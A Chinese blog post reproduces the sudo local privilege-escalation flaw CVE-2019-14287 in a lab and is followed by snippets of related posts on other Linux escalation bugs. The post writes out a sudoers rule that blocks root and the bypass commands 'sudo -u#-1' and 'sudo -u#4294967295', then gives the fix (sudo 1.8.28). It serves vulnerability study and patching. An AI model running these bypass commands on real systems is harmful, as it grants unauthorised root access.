Linux sudo 本地提权漏洞复现(CVE-2019-14287)

最新推荐文章于 2025-07-03 22:38:02 发布
最新推荐文章于 2025-07-03 22:38:02 发布
阅读量848 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: # poc+漏洞 文章标签: sudo  Linux 漏洞复现
本文为博主原创文章,未经博主允许可以转载。
本文链接:https://blog.youkuaiyun.com/helloexp/article/details/102563735
10月14日,Unix、Linux曝出严重本地提权漏洞CVE-2019-14287,允许拥有sudo权限的用户在特定条件下执行任意root命令。此漏洞可通过修改sudoers文件并利用-1或无符号整数绕过安全策略。升级到sudo 1.8.28可修复此问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

10月14日 Unix 、 Linux 爆出了一个严重的本地提权漏洞
通过一个拥有 sudo 权限的用户,在特定场景下可以执行任意的root 命令(sudo 安全策略绕过问题)

漏洞演示环境搭建如下

  • 第一步–修改配置文件
vim /etc/sudoers

root ALL=(ALL:ALL) ALL 下面添加一行测试用户内容

alice ALL = (ALL,!root) /usr/bin/vi,/usr/bin/id

添加完结果如下
在这里插入图片描述

上述这条命令的意思是,alice 用户能够以 非root 的身份进行sudo 执行id 和 vi 命令

  • 第二步–新建alice 用户
useradd alice
  • 第三步–进行测试
su alice    # 通过alice 账户执行命令进行测试

执行sudo id进行测试【正常情况下返回结果如下】
在这里插入图片描述
第一种利用方式:执行 sudo -u#-1 id 进行测试【利用漏洞的返回结果如下,其中-1 也可以替换为-2、-3 等值,只不过uid 就不是root 了,gid、groups 都是root】
在这里插入图片描述
第二种利用方式:执行sudo -u#4294967295 进行测试【利用漏洞的返回结果如下,其中4294967295 是-1 的无符号整型对应的值】
在这里插入图片描述
当我们利用CVE-2019-14287 进行权限绕过之后可以发现成功执行 id 命令

解决方法
sudo 官网已经发布了针对此次漏洞的更新,直接升级到 1.8.28 即可
在这里插入图片描述

https://www.sudo.ws/alerts/minus_1_uid.html

BR
以上

sudo漏洞(CVE-2019-14287)
谢公子的博客
02-24 3138
目录 漏洞背景 漏洞影响版本 利用条件 漏洞复现 修复建议 漏洞背景 2019年10月14日,CVE官方发布了CVE-2019-14287漏洞预警。通过特定payload,用户可升至root限。 漏洞影响版本 sudo < 1.8.28 利用条件 sudo的版本号<1.8.28 知道当前用户的密码 当前用户存在于su...
sudo相关漏洞CVE-2019-18634、CVE-2019-14287
悦分享
08-07 888
实际上,只要用户的限足够高,即拥有最高sudo限的用户,并且在Runas规范中定义了ALL关键字的话,他们就可以运行Runas规范中明确禁止使用的那些root命令,而且以这种方式运行的命令其日志项所显示的目标用户为4294967295,而不是root。但是,sudo日志条目中记录下的命令运行用户的ID为“4294967295”,而并非root用户(或用户ID为“0”),除此之外,因为用户ID是通过-u选项指定的,并且不会在密码数据库中存储,所以PAM会话模块也不会运行。上述命令运行之后,将返回“0”。.
Linux sudo 漏洞 CVE-2021-3156 复现 附exp
god_Zeo的安全博客
02-04 1989
0x01 CVE-2021-3156: 缓冲区溢出漏洞sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root限。 0x02 影响版本 Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 不受影响版本 Sudo =>1.9.5p2 0x03 漏洞检测 测试环境:ubuntu:20.04 检测是否存在 s
Linuxsudo漏洞复现
weixin_44767073的博客
11-13 781
关于sudo Linux是多用户多任务的操作系统, 共享该系统的用户往往不只一个。出于安全性考虑, 有必要通过useradd创建一些非root用户, 只让它们拥有不完全的限; 如有必要再来限执行。 sudo就是来解决这个需求的: 这些非root用户不需要知道root的密码,就可以到root,执行一些root才能执行的命令。执行命sudo -u <用户名> <令>...
SUDO的15重方法
2303_77008280的博客
05-07 1099
Linux
关于Linux sudo 本地漏洞(CVE-2025-32462、CVE-2025-32463)漏洞的修复方案
weixin_48864281的博客
07-02 1849
CVE-2025-32462 Linux sudo 本地漏洞在于 sudo-h(--host)选项存在缺陷,该选项本应与 -l(--list)配合使用来查询远程主机限,但实际未严格限制其仅用于查询功能,导致攻击者可能结合命令执行或文件编辑操作实现本地。近日,Linux sudo 工具公开存在两个紧密关联的本地漏洞CVE-2025-32462 / CVE-2025-32463)。Linux sudo 本地漏洞CVE-2025-32462、CVE-2025-32463)
Linux sudo 本地漏洞(CVE-2025-32462、CVE-2025-32463) 复现+验证poc
最新发布
qq_45770644的博客
07-03 628
漏洞源于sudo-h(--host)选项存在缺陷,该选项本应与-l(--list)配合使用来查询远程主机限,但实际未严格限制其仅用于查询功能。SudoLinux系统中常见的高限命令行工具,它允许授用户根据系统安全策略,以超级用户(root)或其他用户身份执行命令,广泛用于实施最小限原则,让用户无需共享root密码即可完成需要限的管理任务,并在系统日志中生成审计记录。请注意,在进行任何系统更新或配置更改之前,建议备份重要数据,并在测试环境中进行充分的测试。首先,攻击者需为本地限用户;
Linux内核漏洞(Dirty-pipe)复现
qq_69775412的博客
07-25 777
CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
Linux Privilege Escalation Kernel Exploits | Linux本地内核漏洞复现 CVE-2015-1328
Shadow_DAI_990101的博客
09-04 1699
漏洞源于overlayfs文件系统在上层文件系统目录中创建新文件时没有正确检查文件限。它只检查了被修改文件的属主是否有限在上层文件系统目录写入,导致当从底层文件系统目录中拷贝一个文件到上层文件系统目录时,文件属性也随同拷贝过去。如果Linux内核设置了CONFIG_USER_NS=y和FS_USERNS_MOUNT标志,将允许一个普通用户在低限用户命名空间中mout一个overlayfs文件系统。本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而升到管理员限。
sudo限绕过漏洞复现CVE-2019-14287
玄道的网安博客
06-25 951
前言 sudo 是所有 unix操作系统(BSD, MacOS, GNU/Linux) 基本集成的一个用户限控制/切换程序。允许管理员控制服务器下用户能够切换的用户CVE-2019-14287是管理员在配置文件中用了ALL关键词后造成的。 影响版本 sudo < 1.8.28 利用条件 1、sudo -v < 1.8.28 2、知道当前用户的密码 3、当前用户存在于sudo限列表 我们来看一下/etc/sudoers 漏洞复现 sudo -u#-...
sudo本地漏洞CVE-2025-3243)
ubaichu的博客
07-03 289
Sudo 从 ​​1.9.14 版本​​开始修改了 chroot 功能的实现逻辑:在解析 sudoers 规则​​之前​​,先通过 pivot_root() 和 unpivot_root() 函数临时切换根目录至用户指定的路径(如 sudo -R /web)​​执行上下文​​:Sudo 进程本身以 ​​root 限​​运行,因此恶意代码直接获得 root 限,​​绕过 sudoers 规则验证​​。​​__attribute__((constructor))​​:确保库被加载时自动执行代码。
Dirty Pipe – Linux 内核本地漏洞
Adminxe的博客
03-08 6628
一、漏洞简介 CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通限的用户升到特 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。 二、影响范围 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
Linux本地漏洞复现与检测思路
weixin_46137328的博客
10-15 2183
我做的是linux本地漏洞复现。但本地漏洞并不像其他web漏洞一样,可以直接pull一个docker镜像就ok了,的洞复杂在于配置环境,基本都是在虚拟机里复现,一个镜像的大...
Linux系统漏洞本地
xiongIT的博客
11-23 2262
如何预防Linux系统漏洞本地
Linux Kernel本地漏洞CVE-2022-0847)漏洞复现
mingyqf的博客
03-08 3544
参考: TeamsSix 参考链接:https://mp.weixin.qq.com/s/6VebZCKAv6kkmQme4GCQ_w 0x00 前言 CVSS 评分:7.8 影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102 RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通限的用户升到特 root 这个漏洞作者将其命名为了 Dirty Pipe,一看到这名字讲道理就让人想到了 Dirty Cow,这是
Linux-dirty pipe内核漏洞复现-编号:CVE-2022-0847
08-31 1581
漏洞属于Linux漏洞, 攻击者可利用该漏洞使任何非特(本地)用户在易受攻击的主机上获得root限,非特进程可以将代码注入到根进程使得攻击者可获取服务器的所有限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛),很多人应该了解并且能利用该漏洞。...
脏牛Linux本地漏洞复现CVE2016-5195)
Ping_Pig的博客
10-24 2685
漏洞介绍: 脏牛漏洞CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响。恶意攻击者可以轻易绕过常用的漏洞防御方法,对几百万用户进行攻击。国外安全公司Bindecy对该补丁和内容做出深入研究后发现补丁任然存在缺陷,由此还衍生出了“大脏牛”漏洞 漏洞范围: Linux kernel &gt...
CVE-2025-32462-Linux sudo本地漏洞复现
selecthch的博客
07-02 2161
Linux 是一个免费开源的类Unix操作系统,广泛应用于服务器、嵌入式设备和云计算平台。sudoLinux 系统中管理限的核心工具,允许授用户临时获取 root 或其他用户限执行命令,既保障系统安全又便于操作审计。近日,Linux sudo 工具公开存在两个紧密关联的本地漏洞CVE-2025-32462 / CVE-2025-32463)。主流 Linux 发行版默认配置下,攻击者可利用这两个漏洞从普通用户升至限。
linux本地漏洞,Linux本地漏洞 请立即更新udev程序
weixin_39847099的博客
05-16 91
2011-11-28 13:03朋友你好!我刚开始搞linux,碰到了很多问题,想问你下,希望能帮我解答下。下面是我的一段shell 程序#!/bin/shwhile [ 0 ]doread scoreif [ $score -lt 60 ];thenecho " you must work hard!"elif [ $score -lt 80 ]echo " just so so,you sho...
如何在虚拟机中复现 CVE-2019-13288 漏洞 环境搭建步骤
06-26
注意:CVE-2019-13288是一个Linux内核漏洞,具体是PTRACE_TRACEME本地漏洞。因此,复现环境需要包含有漏洞Linux内核版本,并在其上触发漏洞。步骤:1.准备Ubuntu虚拟机:安装Ubuntu20.04.2LTS(或其他包含漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值